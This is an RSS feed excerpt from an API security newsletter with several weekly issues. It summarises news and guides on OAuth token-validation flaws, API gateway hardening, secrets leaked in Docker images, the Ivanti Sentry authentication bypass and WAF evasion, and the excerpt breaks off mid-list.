										<content:encoded><![CDATA[<p>This week, <span style="font-weight: 400;">we have important news of a vulnerability in the OAuth social sign-in feature of many popular platforms, potentially impacting billions of users. We have two articles from The NewStack, the first a guide on securing your API gateway and the second how to design scalable SaaS API security. We also have news of a significant partnership between Microsoft and 42Crunch designed to deliver end-to-end API security for enterprises. We finish with two guides, the first on preventing API breaches and the second from Dana Epp on using Burp Collaborator to prove API exploitability.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Flaws in OAuth social sign-in put billions at risk</span></h2>
<p><a href="https://www.scmagazine.com/news/flaws-in-oauths-social-sign-in-could-have-put-billions-of-users-at-risk" target="_blank" rel="noopener"><span style="font-weight: 400;">The most important item this week</span></a><span style="font-weight: 400;"> (and in the last few months) is the vulnerability discovered by Salt Labs in implementing the OAuth protocol in several popular websites. The vulnerability could have allowed attackers to harvest tokens using a malicious site using OAuth2 social logins and then use these harvested tokens to gain full access to accounts on vulnerable websites. The research describes vulnerabilities on the Grammarly, Vidio, and Bukalapak websites which have now been remediated on all three websites.</span></p>
<p><span style="font-weight: 400;">The </span><span style="font-weight: 400;"><a href="https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts" target="_blank" rel="noopener">original disclosure</a> on the Salt Labs website</span><span style="font-weight: 400;"> is worth reading to fully appreciate how a subtle omission on the vulnerable website’s OAuth handler code could create such a serious vulnerability. During the OAuth token exchange, the client application must validate the token&#8217;s identity received from the authorizing server (such as Google or Facebook) to ensure that the application ID matches its own. In other words, does the token belong to the application, or is it a stolen or harvested token from another application?</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10993" src="https://apisecurity.io/wp-content/uploads/2023/11/OAuth-website-Vulnerability-300x191.jpg" alt="" width="600" height="382" srcset="https://apisecurity.io/wp-content/uploads/2023/11/OAuth-website-Vulnerability-300x191.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/11/OAuth-website-Vulnerability-1024x651.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/11/OAuth-website-Vulnerability-768x488.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/11/OAuth-website-Vulnerability-1536x976.jpg 1536w, https://apisecurity.io/wp-content/uploads/2023/11/OAuth-website-Vulnerability.jpg 1723w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p>The image above shows OAuth&#8217;s standard “implicit grant type” flow. In step 5, the user presents the token received previously to the client application, which then asks the authorization server for the token&#8217;s identity (steps 6 and 7). Before issuing the request at step 6, the client application is expected to verify that the token contains a client_id value identical to its own ID value. If not, the token is fake or has been tampered with and should be rejected. Unfortunately, this research discovered three websites where this check was omitted, allowing fake, harvested tokens to be used. These fake tokens would then assign the attacker all the rights and privileges on the vulnerable site that the victim user had — potentially a total account takeover.</p>
<p>The <a href="https://developers.facebook.com/docs/facebook-login/guides/advanced/manual-flow" target="_blank" rel="noopener">guidance from Facebook</a> is very explicit in this regard:<br />
<cite></cite></p>
<p style="padding-left: 40px;"><cite>“When token is received, it needs to be verified. You should make an API call to an inspection endpoint that will indicate who the token was generated for and by which app. As this API call requires using an app access token, never make this call from a client. Instead make this call from a server where you can securely store your app secret.”</cite></p>
<p>I will be totally transparent here and admit that while I was aware of the importance of this step, I am almost certain I have written code that omits this important verification step. I predict that many other websites are vulnerable to this same issue and that this will not be the last time we feature it in this newsletter.</p>
<h2><span style="font-weight: 400;">Article: Five best practices for security API gateways</span></h2>
<p>In the first of two guides from The NewStack, we look at <a href="https://thenewstack.io/5-best-practices-for-securing-your-api-gateway/" target="_blank" rel="noopener">five best practices for API gateways</a>. The API gateway has become the stalwart in the front line of defense of APIs, and yet many API teams fail to take advantage of the many security features offered by their gateways.</p>
<p>The article recommends that the principle of <strong>zero trust</strong> should be foremost when configuring API gateways. To implement zero trust in your API gateway, you must validate and authenticate every user, request, origin, and action before granting access.</p>
<p>The five top recommendations featured in the article are:</p>
<ol>
<li><strong>Authentication</strong>: Use token-based authentication with short-lived tokens. Use tokens in preference to keys, keep the token lifetime short to avoid the impact of loss or theft, ensure that tokens are transmitted securely over TLS, and ensure that you fully validate signed tokens to ensure their authenticity.</li>
<li><strong>Authorization</strong>: Strictly enforce role-based access control (RBAC) for all API endpoints. Use the principle of least-privilege, and manage the claims in your tokens carefully to ensure that you do not have wide open access.</li>
<li><strong>Rate Limiting</strong>: Implement dynamic, layered rate limiting based on user behavior and context. This really is one of the easier ones to get right, as gateways tend to have rich features around rate limiting, allowing it to be based on IP address, session or user IDs.</li>
<li><strong>CORS</strong>: Explicitly define and restrict allowed origins. Use well-formulated CORS policies to ensure that your APIs are not wide open to any attacker and, rather, can only be accessed from the intended origin (usually your web application).</li>
<li><strong>Logging</strong>: Implement real-time monitoring and alerting for anomalies. Verbose and accurate logs are essential to ensure that any API anomalies are identified and can be addressed.</li>
</ol>
<p>To this list, I suggest that, where available on their API gateway, security teams enable the packet inspection capabilities of their API gateways and use this in conjunction with the OpenAPI definition to enforce request and response data validation. Remember that API 03:2023 – Broken Object Property Level Authorisation is all about data validation.</p>
<h2><span style="font-weight: 400;">Article: How to design scalable SaaS API security</span></h2>
<p><a href="https://thenewstack.io/how-to-design-scalable-saas-api-security/" target="_blank" rel="noopener">The second guide from The NewStack</a> features the views of Curity on how to design scalable SaaS API security. The article describes the importance of a robust and scale OAuth2 authorization framework (very timely based on our first article). It stresses the importance of choosing the correct flow for the application in question (and implementing that flow correctly to avoid security loopholes).</p>
<p>The guide then looks at the important choice of an authorization server. It suggests that simply defaulting to the cloud provider&#8217;s built-in implementation may not always be optimal and that the choice requires sufficient care and attention. Designers should pay attention to the ease of deployment and redundancy or restore times in the case of a failure since the authorization server is mission-critical.</p>
<p>Regarding the use of OAuth2, the guide stresses the importance of not only choosing the correct flow but also ensuring that tokens are designed optimally to minimize the scope of the claims being made (the principle of least privilege) and to ensure the minimum validity is used (a point made in the second article too).</p>
<p>Thanks to Curity for another informative guide on an important topic.</p>
<h2><span style="font-weight: 400;">Tools: 42Crunch and Microsoft Partner to Deliver End-to-End API Security</span></h2>
<p>Yesterday, 42Crunch and Microsoft announced an integration of services to help <a href="https://42crunch.com/42crunch-and-microsofts-defender-for-cloud-partner-to-deliver-end-to-end-api-security/" target="_blank" rel="noopener">enterprises adopt a full-lifecycle approach to API security</a>. The partnership provides continuous API protection from design to runtime to help Microsoft’s enterprise customers protect their APIs from attacks and data breaches.</p>
<p>With Microsoft Defender for APIs, now in GA, an offering as part of <a href="https://aka.ms/MDCIgnite2023" target="_blank" rel="noopener">Microsoft Defender for Cloud – a cloud-native application protection platform</a>, organizations can improve their security posture and quickly detect active real-time threats. <span style="font-weight: 400;">This integration empowers </span><span style="font-weight: 400;">developers to test</span><span style="font-weight: 400;"> their APIs for security during development and empowers security admins to gain full lifecycle visibility into the security posture of their APIs within Defender for Cloud.</span></p>
<p>Further details of how the integration works are available <a href="https://learn.microsoft.com/en-gb/azure/defender-for-cloud/defender-partner-applications" target="_blank" rel="noopener">here.</a></p>
<h2><span style="font-weight: 400;">Guide: How to prevent API breaches</span></h2>
<p>The <a href="https://thehackernews.com/2023/09/how-to-prevent-api-breaches-guide-to.html" target="_blank" rel="noopener">next guide</a> comes courtesy of The Hacker News and is a compendium of best practices that can be used to prevent API breaches. Although many of these will be familiar to readers of this newsletter, this guide does highlight some of the critical design and test fundamentals for anyone involved in securing APIs.</p>
<p>Right at the top of the list is the twin pairing of <strong>authentication and authorization</strong>, which are certainly top issues for API security — most breaches we see will include a failure of one or both of these. They describe the following key topics:</p>
<ul>
<li>API keys and tokens: be sure to safeguard keys and tokens, use tokens with short lifetimes, and transmit them securely.</li>
<li>OAuth and OpenID Connect: use industry-proven and robust protocols to establish authentication and authorization, and be sure to implement them securely (again, see the first article).</li>
<li>Role-based access control: Only provision the minimum necessary privilege to users.</li>
</ul>
<p>Second on the list is <strong>data encryption</strong>, which is vital to ensure that APIs do not leak data or information unnecessarily. The key topics here include:</p>
<ul>
<li>SSL/TLS certificates: Ensure that server certificates are valid (watch for expiring certificates) and that clients fully validate the certificate chain.</li>
<li>Transport Layer Security: Use TLS everywhere to ensure data privacy, and between microservices use mutual TLS where possible.</li>
<li>Encryption of data at rest: When storing data on the filesystem use encryption to protect it, and when storing in a database use the built-in database features to protect the data.</li>
</ul>
<p>Also critically important is the topic of <strong>API design and implementation</strong> to ensure that APIs are secure by design. The key topics here are:</p>
<ul>
<li>Versioning: Manage deprecated APIs and ensure that API changes do not break existing clients.</li>
<li>Input validation and data sanitization: Use core principles from AppSec to ensure that all input data is validated and sanitized to prevent possible injection attacks.</li>
<li>API endpoint security: Ensure that API endpoints include proper checks for authentication and authorization.</li>
</ul>
<p><strong>Testing</strong> is critical in ensuring that flaws in APIs do not make it to production. A well rounded approach to testing yields the best results and should include the following:</p>
<ul>
<li>Automated Testing: Use automatic API testing tools in the CI/CD pipeline to ensure APIs are compliant with their specification and do not contain basic errors such as missing authentication or authorization.</li>
<li>Unit Testing: Developers should test individual elements of API functionality as they implement it within their environments.</li>
<li>Integration Testing: Test the full API to confirm it works with dependent components.</li>
<li>Functional Testing: Test the functionality of the API to confirm it behaves as expected.</li>
<li>Continuous Automated Red Teaming (CART): Use red teams and/or managed bug bounty programs to keep on top of API security risk.</li>
</ul>
<h2><span style="font-weight: 400;">Guide: Proving API exploitability with Burp Collaborator</span></h2>
<p>Finally this week, <a href="https://danaepp.com/proving-api-exploitability-with-burp-collaborator" target="_blank" rel="noopener">we have another guide</a>, this time featuring the PortSwigger Burp Collaborator tool to prove the exploitability of APIs, particularly for attacks which are blind and do not reveal indication of compromise to the main output.</p>
<p>Burp Collaborator is a rather useful companion tool for uses of paid versions of Burp Suite. The diagram below shows the basic usage: a tester using Burp Suite submits a payload to the target and if it is vulnerable, will extract the payload and access links which will trigger access to a URL on Burp Collaborator which will store the payload for analysis in Burp Suite.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10994" src="https://apisecurity.io/wp-content/uploads/2023/11/Burp-collaborator-300x119.jpg" alt="" width="600" height="238" srcset="https://apisecurity.io/wp-content/uploads/2023/11/Burp-collaborator-300x119.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/11/Burp-collaborator-768x304.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/11/Burp-collaborator.jpg 860w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p>As usual Dana provides a great guide on how to use it in your testing, but if you are looking for an excellent real-world example then <a href="https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044" target="_blank" rel="noopener">this write-up</a> from AssetNote is a great read. Thanks to both for the great guides.</p>
<p>The post <a href="https://apisecurity.io/issue-223-flaws-in-oauth-securing-api-gateways-scalable-saas-security/">Issue 233: Flaws in OAuth social sign-in, securing API gateways, scalable SaaS security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 232: API attacks surge, the silent threat of APIs, Jumpcloud incident review</title>
		<link>https://apisecurity.io/232-api-attacks-surge-the-silent-threat-of-apis-jumpcloud-incident-review/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Nov 2023 22:57:27 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10985</guid>

					<description><![CDATA[<p>This week, we have articles on the surge in API attacks as cybercriminals increasingly target financial services and new data on the silent threat of APIs. We have a retrospective on the recent Jumpcloud incident from an API perspective and a great guide on seven things about API security from Philippe de Ryck. We conclude [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/232-api-attacks-surge-the-silent-threat-of-apis-jumpcloud-incident-review/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/232-api-attacks-surge-the-silent-threat-of-apis-jumpcloud-incident-review/">Issue 232: API attacks surge, the silent threat of APIs, Jumpcloud incident review</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have articles on the surge in API attacks as cybercriminals increasingly target financial services and new data on the silent threat of APIs. We have a retrospective on the recent Jumpcloud incident from an API perspective and a great guide on seven things about API security from Philippe de Ryck. We conclude with a look at the OAuth.Tools portal, and another guide from Dana Epp.</p>
<h2><span style="font-weight: 400;">Article: API attacks surge as cybercriminals target financial service</span></h2>
<p>In the <a href="https://www.csoonline.com/article/653719/web-app-api-attacks-surge-as-cybercriminals-target-financial-services.html" target="_blank" rel="noopener">first of our articles</a> this week on the rise of API security risks, we cover a report from CSOOnline discussing the increase in attacks on APIs and web apps in the financial services industry. According to a report from Akamai, Q2 saw a 65% rise year on year in such attacks, with the majority directed at banks. The report covers over 340,000 servers in 4,000 locations and also reports a rise in Layer 3/4 DDoS attacks.</p>
<p>API security risks pose persistent threats to organizations across sectors, with the growing use of APIs giving attackers more ways to break authentication controls, exfiltrate data, or perform disruptive acts. Of the financial services targeted, banks faced the most attacks at 58%, with other industry segments (Fintechs and insurance) facing ever-growing challenges as the pace of digitization gains momentum.</p>
<p>One of the interesting statistics quoted in the report is their finding that Local File Inclusion (LFI) attacks are the top attack vector, accounting for 58% of attacks, with Cross-Site Scripting (XSS) and SQL Injection (SQLi) coming in second and third place. This data is not borne out by my own research, which reveals that broken authentication and secret leakage are the biggest threats to APIs.</p>
<p>The report concludes that financial services are increasingly integrating third-party risk management into their overall risk management policies to mitigate the risk from third parties.</p>
<h2><span style="font-weight: 400;">Article: The silent threat of APIs</span></h2>
<p><a href="https://www.darkreading.com/attacks-breaches/silent-threat-of-apis-what-new-data-reveals-about-unknown-risk" target="_blank" rel="noopener">The next report on the threat from APIs</a> comes from Richard Bird (CSO of Traceable AI), covering their report on the state of API security in 2023. The report covers findings from 1,629 respondents from over 100 countries and six major industries. The headline figures are startling: 74% of organizations have experienced three or more API-related breaches in the last two years. The expansion rate of connected organizations is also highlighted by the statistic that over 88% of organizations have over 2,500 cloud applications.</p>
<p>Bird’s key takeaway is that APIs contribute to increased unknown risk for organizations. Although organizations are conscious of the risk of APIs, over 40% of them reported that they only test a small fraction of their APIs for vulnerabilities. Without being able to measure API risk, it becomes challenging for organizations to detect and contain API risk.</p>
<p>The report highlights how APIs are driving the expansion of the attack surface, namely:</p>
<ul>
<li>Sheer volume of APIs: The volume of APIs continues to grow exponentially, and this is not restricted to public-facing APIs, as internal and 3rd party APIs are growing at similar rates.</li>
<li>Diversity in API types: APIs are a long way from being a uniform attack surface since many protocols are in play and many more deployment and configuration options. This creates a growing and complex attack surface, with 58% of respondents claiming that APIs increase their attack surface.</li>
<li>Varied perceptions about API risk: Despite the high prevalence of API-based incidents arising from poor security, many respondents sought to downplay the risk, with 8% feeling it was negligible.</li>
<li>Unknown risk and the expanding attack surface: As highlighted earlier, the unknown attack surface makes it harder to contain and manage risk, with many organizations being unaware of their attack surface.</li>
</ul>
<p>For Bird, the biggest risk to organizations and their connected digitization strategy arises from unknown (and hence) unquantified risk.</p>
<h2><span style="font-weight: 400;">Article: What happened with the Jumpcloud incident</span></h2>
<p>Recently, <a href="https://apisecurity.io/issue-229-incidents-with-duolingo-and-jumpcloud-fastapi-for-apis-and-five-best-practices/" target="_blank" rel="noopener">we covered an incident</a> on the Jumpcloud platform where users were advised to rotate API keys “out of an abundance of caution,” and this week, <a href="https://www.techradar.com/pro/what-happened-with-jumpcloud-an-api-perspective" target="_blank" rel="noopener">we have a post-mortem report</a> on the incident from TechRadar.</p>
<p>The first concern was the lack of transparency from JumpCloud in communications around the incident. The initial communication was a brief note to rotate API keys and an apology, but no further explanation was given, leading to speculation in the wider community. According to the report, the breach was a result of a spear-phishing campaign that was able to gain access to Jumpcloud’s internal infrastructure and target a subset of its customers. This left JumpCloud with no option but to force a reset of all customer API keys.</p>
<p>JumpCloud has since provided an update to customers, reporting that only a few customers and systems were impacted and that the threat had now been totally contained. The attack highlights an increasing trend where attackers are targeting cloud service providers due to the rich nature of the assets, including SSO, MFA, password management, and device management that these providers hold. As per this attack, often the easiest attacks are simply to steal API keys and use those to infiltrate downstream services.</p>
<p>Unfortunately, there is no silver bullet in minimizing the threat of stolen or leaked API keys and tokens. Typical guidance includes ensuring a robust exchange or revocation process exists, minimizing the lifetime of keys and tokens, and reducing the scope of tokens to reduce the impact of a lost or stolen token.</p>
<h2><span style="font-weight: 400;">Guide: Seven things about API security</span></h2>
<p>The next guide is destined to be a favorite with readers and features <a href="https://pragmaticwebsecurity.com/talks/seventhingsapisecurity" target="_blank" rel="noopener">Dr. Philippe De Ryck discussing seven things about API security</a> from a recent talk he gave. Philippe has kindly made the slides available, and anyone working in the realm of API security is advised to grab a copy and understand the content.</p>
<p>As a case study, Philippe uses the example of how not to do APIs from the <a href="https://apisecurity.io/issue-187-rce-and-api-vulnerability-in-oas-platform-account-takeover-in-yunmai-smart-scale/" target="_blank" rel="noopener">Yunmai smart scale</a> (one of our most popular breach reports). Philippe uses this case study to illustrate why developers so frequently make mistakes in implementing authorization and provides some easily consumable patterns for how to get it right the first time around.</p>
<p>Philippe’s slides then go on to cover his seven key things about APIs, namely:</p>
<ul>
<li>Centralize complex authorization logic &#8211; avoid so-called spaghetti code implementing authorization in various disconnected locations in the code base.</li>
<li>Empower audibility &#8211; make the intent behind coding decisions explicit and obvious to aid effective code reviews.</li>
<li>Avoid sensitive data exposure &#8211; be careful of your ORM and helper functions like .to_json().</li>
<li>Avoid leaking information &#8211; avoid exposing the implementation internals of your API.</li>
<li>Implement rate limiting &#8211; one of the simplest and easiest ways to prevent your APIs from being abused.</li>
<li>Mitigate guessing attacks &#8211; make identifiers hard to guess using complexity and randomness.</li>
<li>Protect against SSRF &#8211; use CORS to help protect against SSRF.</li>
</ul>
<p>Another great resource from Philippe (be sure to check out <a href="https://pragmaticwebsecurity.com/resources.html" target="_blank" rel="noopener">his many other excellent free resources</a>), and a big thanks to him for his contribution to the community.</p>
<h2><span style="font-weight: 400;">Tools: OAuth.Tools goes beyond just JWTs</span></h2>
<p>Useful API tools are always popular with our readers, and this week, <a href="https://thenewstack.io/oauth-tools-the-online-tool-that-goes-beyond-jwts/" target="_blank" rel="noopener">we have news</a> of the excellent <a href="https://oauth.tools/" target="_blank" rel="noopener">OAuth.Tools</a> from our friends at Curity.</p>
<p>Although ostensibly a JWT editing tool, it offers a wealth of other features that will be useful to anyone working with JWTs, OAuth, and OpenID Connect. The diagram below shows some of the key features, including examples of flows for popular OAuth flows and token management:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10987" src="https://apisecurity.io/wp-content/uploads/2023/11/Issue-232-Article5-174x300.jpg" alt="" width="352" height="607" srcset="https://apisecurity.io/wp-content/uploads/2023/11/Issue-232-Article5-174x300.jpg 174w, https://apisecurity.io/wp-content/uploads/2023/11/Issue-232-Article5-595x1024.jpg 595w, https://apisecurity.io/wp-content/uploads/2023/11/Issue-232-Article5.jpg 716w" sizes="auto, (max-width: 352px) 100vw, 352px" /></p>
<p>This is a really powerful tool, and I recommend bookmarking it if you are involved in wrangling JWTs, OAuth flows, and OpenID Connect. Thanks to Curity for making this available to the community.</p>
<h2><span style="font-weight: 400;">Guide: Finding hidden API endpoints using path prediction</span></h2>
<p>As has become a tradition of late, we finish this week with another guide from Dana Epp looking at <a href="https://danaepp.com/finding-hidden-api-endpoints-using-path-prediction" target="_blank" rel="noopener">how to find hidden API endpoints using path prediction</a>.</p>
<p>Hidden API endpoints are entry points within an application&#8217;s API that are not documented or publicly announced for various reasons. They can possess vulnerabilities, and hence, understanding and locating them is a critical aspect of bolstering API security.</p>
<p>Path prediction is a technique that involves studying the URL structure, endpoint patterns, and other discernible indicators within the API documentation or code to guess potential hidden endpoints. Path prediction is a powerful technique for discovering undisclosed or weakly secured endpoints.</p>
<p>Dana highlights how developers focused on good REST design principles will tend to produce APIs with fairly predictable endpoints. From a red-team perspective, being able to predict API endpoints is a valuable skill.</p>
<p>Another fun read from Dana. Thanks for the contribution.</p>
<p>The post <a href="https://apisecurity.io/232-api-attacks-surge-the-silent-threat-of-apis-jumpcloud-incident-review/">Issue 232: API attacks surge, the silent threat of APIs, Jumpcloud incident review</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 231: API authentication bypass in Ivanti Sentry, Docker images expose API and keys</title>
		<link>https://apisecurity.io/issue-231-api-authentication-bypass-in-ivanti-sentry-docker-images-expose-api-and-keys/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 18 Oct 2023 17:04:01 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10979</guid>

					<description><![CDATA[<p>This week, we have news of an API authentication bypass vulnerability in the Ivanti Sentry cybersecurity product and a report into Docker images that are exposing APIs and private keys. We also have articles on API security’s role in protecting retail apps, how APIs and generative AI interoperate, and how attackers bypass Web Application Firewalls. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-231-api-authentication-bypass-in-ivanti-sentry-docker-images-expose-api-and-keys/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-231-api-authentication-bypass-in-ivanti-sentry-docker-images-expose-api-and-keys/">Issue 231: API authentication bypass in Ivanti Sentry, Docker images expose API and keys</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, <span style="font-weight: 400;">we have news of an API authentication bypass vulnerability in the Ivanti Sentry cybersecurity product and a report into Docker images that are exposing APIs and private keys. We also have articles on API security’s role in protecting retail apps, how APIs and generative AI interoperate, and how attackers bypass Web Application Firewalls. We conclude with Dana Epp showing how to use Postman Flows for exploiting APIs. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: API authentication bypass in Ivanti Sentry</span></h2>
<p><span style="font-weight: 400;">First up this week is </span><a href="https://www.securityweek.com/ivanti-ships-urgent-patch-for-api-authentication-bypass-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">news of a vulnerability</span></a><span style="font-weight: 400;"> in the Ivanti Sentry cybersecurity product. The vulnerability (tracked as </span><a href="https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface?language=en_US" target="_blank" rel="noopener"><span style="font-weight: 400;">CVE-2023-38035</span></a><span style="font-weight: 400;">) impacts versions 9.18 and earlier of the product. </span></p>
<p><span style="font-weight: 400;">The vulnerability allows an attacker to access an administration API endpoint (running on port 8443 by default) without any authentication at all. The API provides a number of high-privilege functions, including changing the configuration, running commands, and writing files to the system. Due to the impact of potential access, the vulnerability is rated critical and assigned a CVSS of 9.8. In their statement, Ivanti highlighted that the likelihood of real-world exploitation is relatively low since, in most cases, this administrative port will not be publicly accessible. As a precaution, they released a set of RPM scripts to patch the issue and advised customers to disable this administrative endpoint unless absolutely needed explicitly.</span></p>
<p><span style="font-weight: 400;">This is another example of </span><a href="https://apisecurity.io/owasp-api-security-top-10/api2-broken-authentication/" target="_blank" rel="noopener"><span style="font-weight: 400;">API 02:2019 — Broken User authentication</span></a><span style="font-weight: 400;">; in this case, it appears there was no authentication at all (never mind it being broken). Instead, the system designers relied on the port being disabled via configuration or being blocked by a firewall as a mitigation. Defense in depth is always the best strategy for a secure system.</span></p>
<h2><span style="font-weight: 400;">Report: Docker images expose APIs and private keys</span></h2>
<p><span style="font-weight: 400;">Next up is an </span><a href="https://securityboulevard.com/2023/09/8-5-of-docker-images-expose-api-and-private-keys/" target="_blank" rel="noopener"><span style="font-weight: 400;">interesting report featured in Security Boulevard</span></a><span style="font-weight: 400;">, citing a report from Git Guardian on the prevalence of stored credentials within Docker images. The report cites previous research from Git Guardian into 10,000 Docker images and then more recent research from the RWTH University in Germany into over 300,000 Docker images on DockerHub. </span></p>
<p><span style="font-weight: 400;">The headline figure is the fact that 8.5% of the images contained stored secrets such as API keys and private keys. Breaking down the credentials by type revealed the following:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">52,107 private keys</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">2,920 cloud keys</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">213 social media keys</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">25 keys for financial tools (Stripe, Square, PayPal, etc)</span></li>
</ul>
<p><span style="font-weight: 400;">The researchers mention some caveats regarding the accuracy of their findings: firstly, not all keys could be tested and validated against their intended systems for validity (leading to false positives), and secondly, not all credentials were necessarily detected (leading to false negatives). </span></p>
<p><span style="font-weight: 400;">Whilst the adoption of containers has been a great boon to developers and IT teams, they do present an additional risk vector for security teams to consider. In my personal experience, I have encountered developers who have mistakenly assumed credentials embedded into a lower layer of a container image would not be accessible. An attacker can either use a tool to unpack the layers or just execute a shell within the running container to access any “secrets”. A container is not a secure storage medium.</span></p>
<p><span style="font-weight: 400;">This report shines a spotlight on an increasingly prevalent problem affecting API security, namely the leakage of keys and tokens. Remember to use a secure and robust credential storage mechanism, for example, a key vault, and do not rely on obfuscation, such as hiding credentials in a container image.</span></p>
<h2><span style="font-weight: 400;">Article: API security’s role in protecting retail apps</span></h2>
<p><a href="https://securityboulevard.com/2023/09/api-securitys-role-in-protecting-retail-cloud-apps/" target="_blank" rel="noopener"><span style="font-weight: 400;">The next article again comes from Security Boulevard</span></a><span style="font-weight: 400;"> and discusses API security’s role in protecting retail apps. The article highlights the growth of APIs, particularly within cloud platforms, where they form a vital part of the connecting fabric and the increasing attractiveness of APIs for attackers. </span></p>
<p><span style="font-weight: 400;">The article then makes a distinction between the control plane (which is largely the responsibility of the cloud provider) and the data layer, which is definitely the responsibility of the end user. Increasingly, this data layer is growing in complexity with both a north-south element (for external connectivity) and an east-west element (for internal connectivity between services). The report highlights the importance of data protection from a governance and compliance perspective and highlights many API data security risks that will be familiar to readers of this newsletter.</span></p>
<p><span style="font-weight: 400;">The most interesting part of the report is the discussion on cloud-native protection platforms, in particular, the protections that can be offered by modern so-called cloud application protection platforms (CNAPP). These offer end-to-end protection and complete lifecycle management of cloud-native applications, covering threats such as web application and API attacks and cloud, storage, and database attacks. As an example, a CNAPP typically encompasses the following:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">DevSecOps </span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Cloud security posture management (CSPM)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Infrastructure-as-code (IaC)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Kubernetes security posture management (KSPM)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Cloud infrastructure entitlement management (CIEM)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Runtime cloud workload protection platform (CWPP)</span></li>
</ul>
<p><span style="font-weight: 400;">This is another timely reminder that good API security requires a layered approach, including hardening and protecting your runtime environments using modern cloud-native protection platforms such as CNAPPs. It’s worth remembering, though, that regardless of how well the underpinning platform is secured, APIs will still be vulnerable if they are poorly designed or implemented or not tested sufficiently.</span></p>
<h2><span style="font-weight: 400;">Article: How APIs and generative AI interoperate</span></h2>
<p><a href="https://siliconangle.com/2023/09/15/apis-generative-ai-supercharge/" target="_blank" rel="noopener"><span style="font-weight: 400;">The next article from Silicon Angle</span></a><span style="font-weight: 400;"> discusses the role APIs play in driving the adoption and integration of generative AI and how the two bring great opportunities but, with it, increased challenges for risk management. The democratization of generative AI (driven by the runaway success of ChatGPT) has enabled software engineers and developers to incorporate AI capabilities into the offerings, and APIs provide the vital connecting tissue between these integrations. The rise of so-called “citizen developers” using low-code platforms and API-connected AI services will be building the next generation of apps. Ironically, many of them will learn these skills using the very AI services they themselves are integrating. </span></p>
<p><span style="font-weight: 400;">More technically savvy users will continue to create complex software systems using multiple APIs and various AI and ML systems to solve some of the world’s hardest challenges. These solutions will then be offered back to the open market to be consumed via &#8211; you guessed it &#8211; APIs. This is a rose-tinted view of a future where we are locked into a spiral of continuous learning and technological advancement. </span></p>
<p><span style="font-weight: 400;">However, this leads to an increasingly complex web of connectivity between systems, which will begin sharing data with one another. This will lead to increasing complexity from a security and compliance viewpoint. Developers must be mindful of the various data privacy requirements associated with the systems they build and the risks exposed by simply connecting everything via an API. </span></p>
<h2><span style="font-weight: 400;">Article: Common bypasses of Web Application Firewalls</span></h2>
<p><a href="https://thenewstack.io/how-attackers-bypass-commonly-used-web-application-firewalls/" target="_blank" rel="noopener"><span style="font-weight: 400;">The next article from The New Stack</span></a><span style="font-weight: 400;"> describes many of the techniques hackers use to attack and bypass Web Application Firewalls (WAFs). This is particularly interesting to API security practitioners since WAFs are commonly the only line of defense for APIs, and it is worth knowing their limitations.</span></p>
<p><span style="font-weight: 400;">The article first identifies some of the most common WAF attack types, including:</span></p>
<ul>
<li style="font-weight: 400;" aria-level="1"><b>Injection attacks:</b><span style="font-weight: 400;"> these may include SQL injection, command injection, and cross-site scripting attacks. Generally, these attacks seek to evade protections (in a WAF or in the backend API or application code) to allow attacks against the underlying systems, such as a database. </span></li>
<li style="font-weight: 400;" aria-level="1"><b>Broken access control:</b><span style="font-weight: 400;"> these attacks either target missing authentication or insufficient authorization validation and are the most common attacks against APIs. WAFs in particular, are ineffective in protecting against this category.</span></li>
<li style="font-weight: 400;" aria-level="1"><b>Vulnerable and outdated components:</b><span style="font-weight: 400;"> when a new vulnerability is discovered in a component, bot farms will scan the internet for publicly exposed instances to attack. WAFs are critical in protecting these types of attacks.</span></li>
</ul>
<p><span style="font-weight: 400;">The article then describes the three types of WAFs, namely:</span></p>
<ul>
